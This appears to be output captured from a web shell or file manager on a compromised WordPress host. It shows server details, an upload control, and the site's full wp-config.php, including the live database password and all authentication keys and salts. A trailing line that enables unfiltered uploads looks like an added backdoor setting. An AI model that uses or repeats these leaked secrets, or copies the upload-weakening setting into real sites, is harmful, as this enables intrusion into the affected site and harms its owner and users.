HEX
Server: Apache
System: Linux srv02.enodia.de 5.15.0-139-generic #149-Ubuntu SMP Fri Apr 11 22:06:13 UTC 2025 x86_64
User: s-t-massivhaus.de_v9um4stdo5 (10018)
PHP: 8.3.30
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/s-t-massivhaus.de/httpdocs/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'st_data_live' );

/** Database username */
define( 'DB_USER', 'st_admin_live' );

/** Database password */
define( 'DB_PASSWORD', 'q86c2Aq5~' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         ',elrd_*m0]S w%d:hZpb(5?,Uu[aYoo}Z22s7Rr}4eVF/.k&ZFCFY*sdemZ %:PT' );
define( 'SECURE_AUTH_KEY',  '7roU2hts*nd#DdB}12p`S0v :|1vS!I^*VO%*G!bH/Rxzj$>f5Cr~?D[nB4L/Cb=' );
define( 'LOGGED_IN_KEY',    '/C}E%#XEp2lBF8BX~N_{1!52$G5!dYhV+H*vM)h<s3A`@/?1mpvJyBd:U&W5~4CQ' );
define( 'NONCE_KEY',        'O?Kxqs.&AM%a3Ey;gINce?y~K@H5-.EI2IqQ61CC~T|^6<3ofcl)|3_e1kh&SRv*' );
define( 'AUTH_SALT',        'FpOetUO=,VlL`R@oz7&^#xU,IoF<jaGiI{Jv3Hg]B&}u@nAX[CK:p OU_{NnQ~X^' );
define( 'SECURE_AUTH_SALT', 'CA` QXz`[dGl7X_.o6pJh9[~;x[rG33Vhb}B4mD$78mbhrU(teun{#D}Uw*LU6Fy' );
define( 'LOGGED_IN_SALT',   'NZ#&}^7i@nGV{#j0+v31X3D<EP`BJF7b,=9g5]U@pvZ0I=!I%hk^C{J@_5}9M}`:' );
define( 'NONCE_SALT',       'VYmOq3^SIIW@AjdixnRSUcfL%T4p(3By<XRvoSu(9M.9k[oOXU +.<=gGHd|.eql' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

define( 'ALLOW_UNFILTERED_UPLOADS', true );